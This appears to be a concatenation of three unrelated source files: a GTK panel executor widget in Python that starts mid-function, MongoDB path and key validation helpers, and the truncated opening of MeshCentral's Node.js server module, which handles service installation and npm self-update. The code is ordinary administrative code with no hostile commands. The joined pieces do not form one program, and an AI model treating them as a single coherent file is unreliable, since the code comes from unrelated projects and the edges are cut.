print("Failed setting image from {}".format(output[0].strip()))
if not self.image.get_visible():
self.image.show()
if self.label.get_visible():
self.label.hide()
else:
if self.image.get_visible():
self.image.hide()
self.label.set_text(output[0].strip())
if not self.label.get_visible():
self.label.show()
elif len(output) == 2:
new_path = output[0].strip()
if "/" not in new_path and "." not in new_path: # name given instead of path
update_image(self.image, new_path, self.settings["icon-size"], self.icons_path)
self.icon_path = new_path
else:
if new_path != self.icon_path:
try:
pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(
new_path, self.settings["icon-size"], self.settings["icon-size"])
self.image.set_from_pixbuf(pixbuf)
self.icon_path = new_path
except:
print("Failed setting image from {}".format(output[0].strip()))
self.label.set_text(output[1].strip())
self.image.show()
if self.label.get_text():
self.label.show()
else:
if self.image.get_visible():
self.image.hide()
if self.label.get_visible():
self.label.hide()
return False
def get_output(self):
if "script" in self.settings and self.settings["script"]:
try:
output = subprocess.check_output(self.settings["script"].split()).decode("utf-8").splitlines()
GLib.idle_add(self.update_widget, output)
except Exception as e:
print(e)
def refresh(self):
thread = threading.Thread(target=self.get_output)
thread.daemon = True
thread.start()
return True
def build_box(self):
if self.settings["icon-placement"] == "left":
self.box.pack_start(self.image, False, False, 2)
self.box.pack_start(self.label, False, False, 2)
if self.settings["icon-placement"] != "left":
self.box.pack_start(self.image, False, False, 2)
def on_enter_notify_event(self, widget, event):
widget.set_state_flags(Gtk.StateFlags.DROP_ACTIVE, clear=False)
widget.set_state_flags(Gtk.StateFlags.SELECTED, clear=False)
def on_leave_notify_event(self, widget, event):
widget.unset_state_flags(Gtk.StateFlags.DROP_ACTIVE)
widget.unset_state_flags(Gtk.StateFlags.SELECTED)
def on_button_press(self, widget, event):
if event.button == 1 and self.settings["on-left-click"]:
self.launch(self.settings["on-left-click"])
elif event.button == 2 and self.settings["on-middle-click"]:
self.launch(self.settings["on-middle-click"])
elif event.button == 3 and self.settings["on-right-click"]:
self.launch(self.settings["on-right-click"])
def on_scroll(self, widget, event):
if event.direction == Gdk.ScrollDirection.UP and self.settings["on-scroll-up"]:
self.launch(self.settings["on-scroll-up"])
elif event.direction == Gdk.ScrollDirection.DOWN and self.settings["on-scroll-up"]:
self.launch(self.settings["on-scroll-up"])
else:
print("No command assigned")
def launch(self, cmd):
print("Executing '{}'".format(cmd))
subprocess.Popen('exec {}'.format(cmd), shell=True)
|
from pathlib import Path
import warnings
from typing import List
from collections import Counter
# Validate if no duplicate video keys exist
# Moved to classes.db_interventions
def validate_video_keys(db_interventions) -> List:
"""Expects db_intervention collection, filters for non unique video_keys
Args:
db_interventions (mongoCollection):
Returns:
List: List of non-unique video keys
"""
interventions = db_interventions.find(
{"video_key": {"$exists": True}}, {"video_key": 1}
)
keys = [_["video_key"] for _ in interventions]
duplicates = [key for key, count in Counter(keys).items() if count > 1]
if duplicates:
warnings.warn("Non unique video keys detected")
return duplicates
# Validate if files exist
def validate_image_paths(db_images) -> List:
"""
Expects db image collection. Checks all paths if they exist.
Warns if any paths do not exist and returns list of image ids where path doesn't exist.
"""
image_ids = []
images = db_images.find({}, {"path": 1})
for _ in images:
if not Path(_["path"]).exists():
image_ids.append(_["_id"])
if image_ids:
warnings.warn(
"Not all images for paths of given image collection exist. Returning ID's of invalid images"
)
return image_ids
# Validate if video files exist
def validate_video_paths(db_interventions):
"""
Expects db interventions collection. Checks all entries with have "video_key" if the video file exists.
Warns if any paths do not exist and returns list of intervention ids where path doesn't exist.
"""
agg = [{"$match": {"video_path": {"$exists": True}}}]
videos = db_interventions.aggregate(agg)
video_ids = []
for _ in videos:
if not Path(_["video_path"]).exists():
video_ids.append(_["_id"])
if video_ids:
warnings.warn(
"Not all videos for paths of given intervention collection exist. Returning ID's of invalid interventions"
)
return video_ids
|
/**
* @description MeshCentral main module
* @author Ylian Saint-Hilaire
* @copyright Intel Corporation 2018-2020
* @license Apache-2.0
* @version v0.0.1
*/
/*xjslint node: true */
/*xjslint plusplus: true */
/*xjslint maxlen: 256 */
/*jshint node: true */
/*jshint strict: false */
/*jshint esversion: 6 */
"use strict";
// If running NodeJS less than version 8, try to polyfill promisify
try { if (Number(process.version.match(/^v(\d+\.\d+)/)[1]) < 8) { require('util.promisify').shim(); } } catch (ex) { }
// If app metrics is available
if (process.argv[2] == '--launch') { try { require('appmetrics-dash').monitor({ url: '/', title: 'MeshCentral', port: 88, host: '127.0.0.1' }); } catch (e) { } }
function CreateMeshCentralServer(config, args) {
var obj = {};
obj.db = null;
obj.webserver = null;
obj.redirserver = null;
obj.mpsserver = null;
obj.apfserver = null;
obj.mqttbroker = null;
obj.swarmserver = null;
obj.mailserver = null;
obj.amtEventHandler = null;
obj.pluginHandler = null;
obj.amtScanner = null;
obj.meshScanner = null;
obj.letsencrypt = null;
obj.eventsDispatch = {};
obj.fs = require('fs');
obj.path = require('path');
obj.crypto = require('crypto');
obj.exeHandler = require('./exeHandler.js');
obj.platform = require('os').platform();
obj.args = args;
obj.common = require('./common.js');
obj.configurationFiles = null;
obj.certificates = null;
obj.connectivityByNode = {}; // This object keeps a list of all connected CIRA and agents, by nodeid->value (value: 1 = Agent, 2 = CIRA, 4 = AmtDirect)
obj.peerConnectivityByNode = {}; // This object keeps a list of all connected CIRA and agents of peers, by serverid->nodeid->value (value: 1 = Agent, 2 = CIRA, 4 = AmtDirect)
obj.debugSources = [];
obj.debugRemoteSources = null;
obj.config = config; // Configuration file
obj.dbconfig = {}; // Persistance values, loaded from database
obj.certificateOperations = null;
obj.defaultMeshCmd = null;
obj.defaultMeshCores = {};
obj.defaultMeshCoresHash = {};
obj.meshAgentBinaries = {}; // Mesh Agent Binaries, Architecture type --> { hash:(sha384 hash), size:(binary size), path:(binary path) }
obj.meshAgentInstallScripts = {}; // Mesh Install Scripts, Script ID -- { hash:(sha384 hash), size:(binary size), path:(binary path) }
obj.multiServer = null;
obj.maintenanceTimer = null;
obj.serverId = null;
obj.serverKey = Buffer.from(obj.crypto.randomBytes(48), 'binary');
obj.loginCookieEncryptionKey = null;
obj.invitationLinkEncryptionKey = null;
obj.serverSelfWriteAllowed = true;
obj.serverStatsCounter = Math.floor(Math.random() * 1000);
obj.taskLimiter = obj.common.createTaskLimiterQueue(50, 20, 60); // (maxTasks, maxTaskTime, cleaningInterval) This is a task limiter queue to smooth out server work.
obj.agentUpdateBlockSize = 65531; // MeshAgent update block size
obj.serverWarnings = []; // List of warnings that should be shown to administrators
obj.cookieUseOnceTable = {}; // List of cookies that are already expired
obj.cookieUseOnceTableCleanCounter = 0; // Clean the cookieUseOnceTable each 20 additions
obj.firstStats = true; // True until this server saves it's not stats to the database
// Server version
obj.currentVer = null;
function getCurrentVerion() { try { obj.currentVer = JSON.parse(obj.fs.readFileSync(obj.path.join(__dirname, 'package.json'), 'utf8')).version; } catch (e) { } return obj.currentVer; } // Fetch server version
getCurrentVerion();
// Setup the default configuration and files paths
if ((__dirname.endsWith('/node_modules/meshcentral')) || (__dirname.endsWith('\\node_modules\\meshcentral')) || (__dirname.endsWith('/node_modules/meshcentral/')) || (__dirname.endsWith('\\node_modules\\meshcentral\\'))) {
obj.parentpath = obj.path.join(__dirname, '../..');
obj.datapath = obj.path.join(__dirname, '../../meshcentral-data');
obj.filespath = obj.path.join(__dirname, '../../meshcentral-files');
obj.backuppath = obj.path.join(__dirname, '../../meshcentral-backup');
obj.recordpath = obj.path.join(__dirname, '../../meshcentral-recordings');
obj.webViewsPath = obj.path.join(__dirname, 'views');
obj.webPublicPath = obj.path.join(__dirname, 'public');
obj.webEmailsPath = obj.path.join(__dirname, 'emails');
if (obj.fs.existsSync(obj.path.join(__dirname, '../../meshcentral-web/views'))) { obj.webViewsOverridePath = obj.path.join(__dirname, '../../meshcentral-web/views'); }
if (obj.fs.existsSync(obj.path.join(__dirname, '../../meshcentral-web/public'))) { obj.webPublicOverridePath = obj.path.join(__dirname, '../../meshcentral-web/public'); }
if (obj.fs.existsSync(obj.path.join(__dirname, '../../meshcentral-web/emails'))) { obj.webEmailsOverridePath = obj.path.join(__dirname, '../../meshcentral-web/emails'); }
} else {
obj.parentpath = __dirname;
obj.datapath = obj.path.join(__dirname, '../meshcentral-data');
obj.filespath = obj.path.join(__dirname, '../meshcentral-files');
obj.backuppath = obj.path.join(__dirname, '../meshcentral-backups');
obj.recordpath = obj.path.join(__dirname, '../meshcentral-recordings');
obj.webViewsPath = obj.path.join(__dirname, 'views');
obj.webPublicPath = obj.path.join(__dirname, 'public');
obj.webEmailsPath = obj.path.join(__dirname, 'emails');
if (obj.fs.existsSync(obj.path.join(__dirname, '../meshcentral-web/views'))) { obj.webViewsOverridePath = obj.path.join(__dirname, '../meshcentral-web/views'); }
if (obj.fs.existsSync(obj.path.join(__dirname, '../meshcentral-web/public'))) { obj.webPublicOverridePath = obj.path.join(__dirname, '../meshcentral-web/public'); }
if (obj.fs.existsSync(obj.path.join(__dirname, '../meshcentral-web/emails'))) { obj.webEmailsOverridePath = obj.path.join(__dirname, '../meshcentral-web/emails'); }
}
// Look to see if data and/or file path is specified
if (obj.config.settings && (typeof obj.config.settings.datapath == 'string')) { obj.datapath = obj.config.settings.datapath; }
if (obj.config.settings && (typeof obj.config.settings.filespath == 'string')) { obj.filespath = obj.config.settings.filespath; }
// Create data and files folders if needed
try { obj.fs.mkdirSync(obj.datapath); } catch (e) { }
try { obj.fs.mkdirSync(obj.filespath); } catch (e) { }
// Windows Specific Code, setup service and event log
obj.service = null;
obj.servicelog = null;
if (obj.platform == 'win32') {
var nodewindows = require('node-windows');
obj.service = nodewindows.Service;
var eventlogger = nodewindows.EventLogger;
obj.servicelog = new eventlogger('MeshCentral');
}
// Start the Meshcentral server
obj.Start = function () {
var i;
try { require('./pass').hash('test', function () { }, 0); } catch (e) { console.log('Old version of node, must upgrade.'); return; } // TODO: Not sure if this test works or not.
// Check for invalid arguments
var validArguments = ['_', 'notls', 'user', 'port', 'aliasport', 'mpsport', 'mpsaliasport', 'redirport', 'rediraliasport', 'cert', 'mpscert', 'deletedomain', 'deletedefaultdomain', 'showall', 'showusers', 'listuserids', 'showusergroups', 'shownodes', 'showmeshes', 'showevents', 'showsmbios', 'showpower', 'clearpower', 'showiplocations', 'help', 'exactports', 'xinstall', 'xuninstall', 'install', 'uninstall', 'start', 'stop', 'restart', 'debug', 'filespath', 'datapath', 'noagentupdate', 'launch', 'noserverbackup', 'mongodb', 'mongodbcol', 'wanonly', 'lanonly', 'nousers', 'mpspass', 'ciralocalfqdn', 'dbexport', 'dbexportmin', 'dbimport', 'dbmerge', 'dbencryptkey', 'selfupdate', 'tlsoffload', 'userallowedip', 'userblockedip', 'swarmallowedip', 'agentallowedip', 'agentblockedip', 'fastcert', 'swarmport', 'logintoken', 'logintokenkey', 'logintokengen', 'logintokengen', 'mailtokengen', 'admin', 'unadmin', 'sessionkey', 'sessiontime', 'minify', 'minifycore', 'dblistconfigfiles', 'dbshowconfigfile', 'dbpushconfigfiles', 'dbpullconfigfiles', 'dbdeleteconfigfiles', 'vaultpushconfigfiles', 'vaultpullconfigfiles', 'vaultdeleteconfigfiles', 'configkey', 'loadconfigfromdb', 'npmpath', 'memorytracking', 'serverid', 'recordencryptionrecode', 'vault', 'token', 'unsealkey', 'name', 'log', 'dbstats', 'translate', 'createaccount', 'resetaccount', 'pass', 'adminaccount', 'domain', 'email'];
for (var arg in obj.args) { obj.args[arg.toLocaleLowerCase()] = obj.args[arg]; if (validArguments.indexOf(arg.toLocaleLowerCase()) == -1) { console.log('Invalid argument "' + arg + '", use --help.'); return; } }
if (obj.args.mongodb == true) { console.log('Must specify: --mongodb [connectionstring] \r\nSee https://docs.mongodb.com/manual/reference/connection-string/ for MongoDB connection string.'); return; }
for (i in obj.config.settings) { obj.args[i] = obj.config.settings[i]; } // Place all settings into arguments, arguments have already been placed into settings so arguments take precedence.
if ((obj.args.help == true) || (obj.args['?'] == true)) {
console.log('MeshCentral v' + getCurrentVerion() + ', remote computer management web portal.');
console.log('This software is open source under Apache 2.0 licence.');
console.log('Details at: https://www.meshcommander.com/meshcentral2\r\n');
if ((obj.platform == 'win32') || (obj.platform == 'linux')) {
console.log('Run as a background service');
console.log(' --install/uninstall Install MeshCentral as a background service.');
console.log(' --start/stop/restart Control MeshCentral background service.');
console.log('');
console.log('Run standalone, console application');
}
console.log(' --user [username] Always login as [username] if account exists.');
console.log(' --port [number] Web server port number.');
console.log(' --redirport [number] Creates an additional HTTP server to redirect users to the HTTPS server.');
console.log(' --exactports Server must run with correct ports or exit.');
console.log(' --noagentupdate Server will not update mesh agent native binaries.');
console.log(' --listuserids Show a list of a user identifiers in the database.');
console.log(' --createaccount [username] Create a new user account.');
console.log(' --resetaccount [username] Unlock an account, disable 2FA and set a new account password.');
console.log(' --adminaccount [username] Promote account to site administrator.');
console.log(' --cert [name], (country), (org) Create a web server certificate with [name] server name.');
console.log(' country and organization can optionaly be set.');
return;
}
// Perform web site translations into different languages
if (obj.args.translate) {
// Check NodeJS version
const NodeJSVer = Number(process.version.match(/^v(\d+\.\d+)/)[1]);
if (NodeJSVer < 8) { console.log("Translation feature requires Node v8 or above, current version is " + process.version + "."); process.exit(); return; }
// Check if translate.json is in the "meshcentral-data" folder, if so use that and translate default pages.
var translationFile = null, customTranslation = false;
if (require('fs').existsSync(obj.path.join(obj.datapath, 'translate.json'))) { translationFile = obj.path.join(obj.datapath, 'translate.json'); console.log("Using translate.json in meshentral-data."); customTranslation = true; }
if (translationFile == null) { if (require('fs').existsSync(obj.path.join(__dirname, 'translate', 'translate.json'))) { translationFile = obj.path.join(__dirname, 'translate', 'translate.json'); console.log("Using default translate.json."); } }
if (translationFile == null) { console.log("Unable to find translate.json."); process.exit(); return; }
// Perform translation operations
var didSomething = false;
process.chdir(obj.path.join(__dirname, 'translate'));
var translateEngine = require('./translate/translate.js')
if (customTranslation == true) {
// Translate all of the default files using custom translation file
translateEngine.startEx(['', '', 'minifyall']);
translateEngine.startEx(['', '', 'translateall', translationFile]);
translateEngine.startEx(['', '', 'extractall', translationFile]);
didSomething = true;
}
// Check if "meshcentral-web" exists, if so, translate all pages in that folder.
if (obj.webViewsOverridePath != null) {
didSomething = true;
var files = obj.fs.readdirSync(obj.webViewsOverridePath);
for (var i in files) {
var file = obj.path.join(obj.webViewsOverridePath, files[i]);
if (file.endsWith('.handlebars') && !file.endsWith('-min.handlebars')) {
translateEngine.startEx(['', '', 'minify', file]);
}
}
files = obj.fs.readdirSync(obj.webViewsOverridePath);
for (var i in files) {
var file = obj.path.join(obj.webViewsOverridePath, files[i]);
if (file.endsWith('.handlebars') || file.endsWith('-min.handlebars')) {
translateEngine.startEx(['', '', 'translate', '*', translationFile, file, '--subdir:translations']);
}
}
}
/*
if (obj.webPublicOverridePath != null) {
didSomething = true;
var files = obj.fs.readdirSync(obj.webPublicOverridePath);
for (var i in files) {
var file = obj.path.join(obj.webPublicOverridePath, files[i]);
if (file.endsWith('.htm') && !file.endsWith('-min.htm')) {
translateEngine.startEx(['', '', 'translate', '*', translationFile, file, '--subdir:translations']);
}
}
}
*/
if (didSomething == false) { console.log("Nothing to do."); }
process.exit();
return;
}
// Setup the Node+NPM path if possible, this makes it possible to update the server even if NodeJS and NPM are not in default paths.
if (obj.args.npmpath == null) {
try {
var nodepath = process.argv[0];
var npmpath = obj.path.join(obj.path.dirname(process.argv[0]), 'npm');
if (obj.fs.existsSync(nodepath) && obj.fs.existsSync(npmpath)) {
if (nodepath.indexOf(' ') >= 0) { nodepath = '"' + nodepath + '"'; }
if (npmpath.indexOf(' ') >= 0) { npmpath = '"' + npmpath + '"'; }
if (obj.platform == 'win32') { obj.args.npmpath = npmpath; } else { obj.args.npmpath = (nodepath + ' ' + npmpath); }
}
} catch (ex) { }
}
// Linux background service systemd handling
if (obj.platform == 'linux') {
if (obj.args.install == true) {
// Install MeshCentral in Systemd
console.log('Installing MeshCentral as background Service...');
var userinfo = require('os').userInfo(), systemdConf = null;
if (require('fs').existsSync('/etc/systemd/system')) { systemdConf = '/etc/systemd/system/meshcentral.service'; }
else if (require('fs').existsSync('/lib/systemd/system')) { systemdConf = '/lib/systemd/system/meshcentral.service'; }
else if (require('fs').existsSync('/usr/lib/systemd/system')) { systemdConf = '/usr/lib/systemd/system/meshcentral.service'; }
else { console.log('Unable to find systemd configuration folder.'); process.exit(); return; }
console.log('Writing config file...');
require('child_process').exec('which node', {}, function (error, stdout, stderr) {
if ((error != null) || (stdout.indexOf('\n') == -1)) { console.log('ERROR: Unable to get node location: ' + error); process.exit(); return; }
var nodePath = stdout.substring(0, stdout.indexOf('\n'));
var config = '[Unit]\nDescription=MeshCentral Server\n\n[Service]\nType=simple\nLimitNOFILE=1000000\nExecStart=' + nodePath + ' ' + __dirname + '/meshcentral\nWorkingDirectory=' + userinfo.homedir + '\nEnvironment=NODE_ENV=production\nUser=' + userinfo.username + '\nGroup=' + userinfo.username + '\nRestart=always\n# Restart service after 10 seconds if node service crashes\nRestartSec=10\n# Set port permissions capability\nAmbientCapabilities=cap_net_bind_service\n\n[Install]\nWantedBy=multi-user.target\n';
require('child_process').exec('echo \"' + config + '\" | sudo tee ' + systemdConf, {}, function (error, stdout, stderr) {
if ((error != null) && (error != '')) { console.log('ERROR: Unable to write config file: ' + error); process.exit(); return; }
console.log('Enabling service...');
require('child_process').exec('sudo systemctl enable meshcentral.service', {}, function (error, stdout, stderr) {
if ((error != null) && (error != '')) { console.log('ERROR: Unable to enable MeshCentral as a service: ' + error); process.exit(); return; }
if (stdout.length > 0) { console.log(stdout); }
console.log('Starting service...');
require('child_process').exec('sudo systemctl start meshcentral.service', {}, function (error, stdout, stderr) {
if ((error != null) && (error != '')) { console.log('ERROR: Unable to start MeshCentral as a service: ' + error); process.exit(); return; }
if (stdout.length > 0) { console.log(stdout); }
console.log('Done.');
});
});
});
});
return;
} else if (obj.args.uninstall == true) {
// Uninstall MeshCentral in Systemd
console.log('Uninstalling MeshCentral background service...');
var systemdConf = null;
if (require('fs').existsSync('/etc/systemd/system')) { systemdConf = '/etc/systemd/system/meshcentral.service'; }
else if (require('fs').existsSync('/lib/systemd/system')) { systemdConf = '/lib/systemd/system/meshcentral.service'; }
else if (require('fs').existsSync('/usr/lib/systemd/system')) { systemdConf = '/usr/lib/systemd/system/meshcentral.service'; }
else { console.log('Unable to find systemd configuration folder.'); process.exit(); return; }
console.log('Stopping service...');
require('child_process').exec('sudo systemctl stop meshcentral.service', {}, function (err, stdout, stderr) {
if ((err != null) && (err != '')) { console.log('ERROR: Unable to stop MeshCentral as a service: ' + err); }
if (stdout.length > 0) { console.log(stdout); }
console.log('Disabling service...');
require('child_process').exec('sudo systemctl disable meshcentral.service', {}, function (err, stdout, stderr) {
if ((err != null) && (err != '')) { console.log('ERROR: Unable to disable MeshCentral as a service: ' + err); }
if (stdout.length > 0) { console.log(stdout); }
console.log('Removing config file...');
require('child_process').exec('sudo rm ' + systemdConf, {}, function (err, stdout, stderr) {
if ((err != null) && (err != '')) { console.log('ERROR: Unable to delete MeshCentral config file: ' + err); }
console.log('Done.');
});
});
});
return;
} else if (obj.args.start == true) {
// Start MeshCentral in Systemd
require('child_process').exec('sudo systemctl start meshcentral.service', {}, function (err, stdout, stderr) {
if ((err != null) && (err != '')) { console.log('ERROR: Unable to start MeshCentral: ' + err); process.exit(); return; }
console.log('Done.');
});
return;
} else if (obj.args.stop == true) {
// Stop MeshCentral in Systemd
require('child_process').exec('sudo systemctl stop meshcentral.service', {}, function (err, stdout, stderr) {
if ((err != null) && (err != '')) { console.log('ERROR: Unable to stop MeshCentral: ' + err); process.exit(); return; }
console.log('Done.');
});
return;
} else if (obj.args.restart == true) {
// Restart MeshCentral in Systemd
require('child_process').exec('sudo systemctl restart meshcentral.service', {}, function (err, stdout, stderr) {
if ((err != null) && (err != '')) { console.log('ERROR: Unable to restart MeshCentral: ' + err); process.exit(); return; }
console.log('Done.');
});
return;
}
}
// Windows background service handling
if ((obj.platform == 'win32') && (obj.service != null)) {
// Check if we need to install, start, stop, remove ourself as a background service
if (((obj.args.xinstall == true) || (obj.args.xuninstall == true) || (obj.args.start == true) || (obj.args.stop == true) || (obj.args.restart == true))) {
var env = [], xenv = ['user', 'port', 'aliasport', 'mpsport', 'mpsaliasport', 'redirport', 'exactport', 'rediraliasport', 'debug'];
for (i in xenv) { if (obj.args[xenv[i]] != null) { env.push({ name: 'mesh' + xenv[i], value: obj.args[xenv[i]] }); } } // Set some args as service environement variables.
var svc = new obj.service({ name: 'MeshCentral', description: 'MeshCentral Remote Management Server', script: obj.path.join(__dirname, 'winservice.js'), env: env, wait: 2, grow: 0.5 });
svc.on('install', function () { console.log('MeshCentral service installed.'); svc.start(); });
svc.on('uninstall', function () { console.log('MeshCentral service uninstalled.'); process.exit(); });
svc.on('start', function () { console.log('MeshCentral service started.'); process.exit(); });
svc.on('stop', function () { console.log('MeshCentral service stopped.'); if (obj.args.stop) { process.exit(); } if (obj.args.restart) { console.log('Holding 5 seconds...'); setTimeout(function () { svc.start(); }, 5000); } });
svc.on('alreadyinstalled', function () { console.log('MeshCentral service already installed.'); process.exit(); });
svc.on('invalidinstallation', function () { console.log('Invalid MeshCentral service installation.'); process.exit(); });
if (obj.args.xinstall == true) { try { svc.install(); } catch (e) { logException(e); } }
if (obj.args.stop == true || obj.args.restart == true) { try { svc.stop(); } catch (e) { logException(e); } }
if (obj.args.start == true || obj.args.restart == true) { try { svc.start(); } catch (e) { logException(e); } }
if (obj.args.xuninstall == true) { try { svc.uninstall(); } catch (e) { logException(e); } }
return;
}
// Windows service install using the external winservice.js
if (obj.args.install == true) {
console.log('Installing MeshCentral as Windows Service...');
if (obj.fs.existsSync(obj.path.join(__dirname, '../WinService')) == false) { try { obj.fs.mkdirSync(obj.path.join(__dirname, '../WinService')); } catch (ex) { console.log('ERROR: Unable to create WinService folder: ' + ex); process.exit(); return; } }
try { obj.fs.createReadStream(obj.path.join(__dirname, 'winservice.js')).pipe(obj.fs.createWriteStream(obj.path.join(__dirname, '../WinService/winservice.js'))); } catch (ex) { console.log('ERROR: Unable to copy winservice.js: ' + ex); process.exit(); return; }
require('child_process').exec('node winservice.js --install', { maxBuffer: 512000, timeout: 120000, cwd: obj.path.join(__dirname, '../WinService') }, function (error, stdout, stderr) {
if ((error != null) && (error != '')) { console.log('ERROR: Unable to install MeshCentral as a service: ' + error); process.exit(); return; }
console.log(stdout);
});
return;
} else if (obj.args.uninstall == true) {
console.log('Uninstalling MeshCentral Windows Service...');
if (obj.fs.existsSync(obj.path.join(__dirname, '../WinService')) == true) {
require('child_process').exec('node winservice.js --uninstall', { maxBuffer: 512000, timeout: 120000, cwd: obj.path.join(__dirname, '../WinService') }, function (error, stdout, stderr) {
if ((error != null) && (error != '')) { console.log('ERROR: Unable to uninstall MeshCentral service: ' + error); process.exit(); return; }
console.log(stdout);
try { obj.fs.unlinkSync(obj.path.join(__dirname, '../WinService/winservice.js')); } catch (ex) { }
try { obj.fs.rmdirSync(obj.path.join(__dirname, '../WinService')); } catch (ex) { }
});
} else {
require('child_process').exec('node winservice.js --uninstall', { maxBuffer: 512000, timeout: 120000, cwd: __dirname }, function (error, stdout, stderr) {
if ((error != null) && (error != '')) { console.log('ERROR: Unable to uninstall MeshCentral service: ' + error); process.exit(); return; }
console.log(stdout);
});
}
return;
}
}
// If "--launch" is in the arguments, launch now
if (obj.args.launch) {
if (obj.args.vault) { obj.StartVault(); } else { obj.StartEx(); }
} else {
// if "--launch" is not specified, launch the server as a child process.
var startArgs = [];
for (i in process.argv) {
if (i > 0) {
var arg = process.argv[i];
if ((arg.length > 0) && ((arg.indexOf(' ') >= 0) || (arg.indexOf('&') >= 0))) { startArgs.push(arg); } else { startArgs.push(arg); }
}
}
startArgs.push('--launch', process.pid);
obj.launchChildServer(startArgs);
}
};
// Launch MeshCentral as a child server and monitor it.
obj.launchChildServer = function (startArgs) {
var child_process = require('child_process');
childProcess = child_process.execFile(process.argv[0], startArgs, { maxBuffer: Infinity, cwd: obj.parentpath }, function (error, stdout, stderr) {
if (childProcess.xrestart == 1) {
setTimeout(function () { obj.launchChildServer(startArgs); }, 500); // This is an expected restart.
} else if (childProcess.xrestart == 2) {
console.log('Expected exit...');
process.exit(); // User CTRL-C exit.
} else if (childProcess.xrestart == 3) {
// Server self-update exit
var version = '';
if (typeof obj.args.selfupdate == 'string') { version = '@' + obj.args.selfupdate; }
else if (typeof obj.args.specificupdate == 'string') { version = '@' + obj.args.specificupdate; delete obj.args.specificupdate; }
var child_process = require('child_process');
var npmpath = ((typeof obj.args.npmpath == 'string') ? obj.args.npmpath : 'npm');
var npmproxy = ((typeof obj.args.npmproxy == 'string') ? (' --proxy ' + obj.args.npmproxy) : '');
var env = Object.assign({}, process.env); // Shallow clone
if (typeof obj.args.npmproxy == 'string') { env['HTTP_PROXY'] = env['HTTPS_PROXY'] = env['http_proxy'] = env['https_proxy'] = obj.args.npmproxy; }
var xxprocess = child_process.exec(npmpath + ' install meshcentral' + version + npmproxy, { maxBuffer: Infinity, cwd: obj.parentpath, env: env }, function (error, stdout, stderr) { });
xxprocess.data = '';
xxprocess.stdout.on('data', function (data) { xxprocess.data += data; });
xxprocess.stderr.on('data', function (data) { xxprocess.data += data; });
xxprocess.on('close', function (code) { console.log('Update completed...'); setTimeout(function () { obj.launchChildServer(startArgs); }, 1000); });
} else {
if (error != null) {
// This is an un-expected restart
console.log(error);
console.log('ERROR: MeshCentral failed with critical error, check MeshErrors.txt. Restarting in 5 seconds...');
setTimeout(function () { obj.launchChildServer(startArgs); }, 5000);
}
}
});
childProcess.stdout.on('data', function (data) {
if (data[data.length - 1] == '\n') { data = data.substring(0, data.length - 1); }
if (data.indexOf('Updating settings folder...') >= 0) { childProcess.xrestart = 1; }
else if (data.indexOf('Updating server certificates...') >= 0) { childProcess.xrestart = 1; }
else if (data.indexOf('Server Ctrl-C exit...') >= 0) { childProcess.xrestart = 2; }
else if (data.indexOf('Starting self upgrade...') >= 0) { childProcess.xrestart = 3; }
else if (data.indexOf('Server restart...') >= 0) { childProcess.xrestart = 1; }
else if (data.indexOf('Starting self upgrade to: ') >= 0) { obj.args.specificupdate = data.substring(26).split('\r')[0].split('\n')[0]; childProcess.xrestart = 3; }
var datastr = data;
while (datastr.endsWith('\r') || datastr.endsWith('\n')) { datastr = datastr.substring(0, datastr.length - 1); }
console.log(datastr);
});
childProcess.stderr.on('data', function (data) {
var datastr = data;
while (datastr.endsWith('\r') || datastr.endsWith('\n')) { datastr = datastr.substring(0, datastr.length - 1); }
console.log('ERR: ' + datastr);
if (data.startsWith('le.challenges[tls-sni-01].loopback')) { return; } // Ignore this error output from GreenLock
if (data[data.length - 1] == '\n') { data = data.substring(0, data.length - 1); }
try {
var errlogpath = null;
if (typeof obj.args.mesherrorlogpath == 'string') { errlogpath = obj.path.join(obj.args.mesherrorlogpath, 'mesherrors.txt'); } else { errlogpath = obj.getConfigFilePath('mesherrors.txt'); }
obj.fs.appendFileSync(obj.getConfigFilePath('mesherrors.txt'), '-------- ' + new Date().toLocaleString() + ' ---- ' + getCurrentVerion() + ' --------\r\n\r\n' + data + '\r\n\r\n\r\n');
} catch (ex) { console.log('ERROR: Unable to write to mesherrors.txt.'); }
});
childProcess.on('close', function (code) { if ((code != 0) && (code != 123)) { /* console.log("Exited with code " + code); */ } });
};
// Get current and latest MeshCentral server versions using NPM
obj.getLatestServerVersion = function (callback) {
if (callback == null) return;
try {
if (typeof obj.args.selfupdate == 'string') { callback(getCurrentVerion(), obj.args.selfupdate); return; } // If we are targetting a specific version, return that one as current.
var child_process = require('child_process');
var npmpath = ((typeof obj.args.npmpath == 'string') ? obj.args.npmpath : 'npm');
var npmproxy = ((typeof obj.args.npmproxy == 'string') ? (' --proxy ' + obj.args.npmproxy) : '');
var env = Object.assign({}, process.env); // Shallow clone
if (typeof obj.args.npmproxy == 'string') { env['HTTP_PROXY'] = env['HTTPS_PROXY'] = env['http_proxy'] = env['https_proxy'] = obj.args.npmproxy; }
var xxprocess = child_process.exec(npmpath + npmproxy + ' view meshcentral dist-tags.latest', { maxBuffer: 512000, cwd: obj.parentpath, env: env }, function (error, stdout, stderr) { });
xxprocess.data = '';
xxprocess.stdout.on('data', function (data) { xxprocess.data += data; });
xxprocess.stderr.on('data', function (data) { });
xxprocess.on('close', function (code) {
var latestVer = null;
if (code == 0) { try { latestVer = xxprocess.data.split(' ').join('').split('\r').join('').split('\n').join(''); } catch (e) { } }
callback(getCurrentVerion(), latestVer);
});
} catch (ex) { callback(getCurrentVerion(), null, ex); } // If the system is running out of memory, an exception here can easily happen.
};
// Get current version and all MeshCentral server tags using NPM
obj.getServerTags = function (callback) {
if (callback == null) return;
try {
if (typeof obj.args.selfupdate == 'string') { callback({ current: getCurrentVerion(), latest: obj.args.selfupdate }); return; } // If we are targetting a specific version, return that one as current.
var child_process = require('child_process');
var npmpath = ((typeof obj.args.npmpath == 'string') ? obj.args.npmpath : 'npm');
var npmproxy = ((typeof obj.args.npmproxy == 'string') ? (' --proxy ' + obj.args.npmproxy) : '');
var env = Object.assign({}, process.env); // Shallow clone
if (typeof obj.args.npmproxy == 'string') { env['HTTP_PROXY'] = env['HTTPS_PROXY'] = env['http_proxy'] = env['https_proxy'] = obj.args.npmproxy; }
var xxprocess = child_process.exec(npmpath + npmproxy + ' dist-tag ls meshcentral', { maxBuffer: 512000, cwd: obj.parentpath, env: env }, function (error, stdout, stderr) { });
xxprocess.data = '';
xxprocess.stdout.on('data', function (data) { xxprocess.data += data; });
xxprocess.stderr.on('data', function (data) { });
xxprocess.on('close', function (code) {
var tags = { current: getCurrentVerion() };
if (code == 0) {
try {
var lines = xxprocess.data.split('\r\n').join('\n').split('\n');
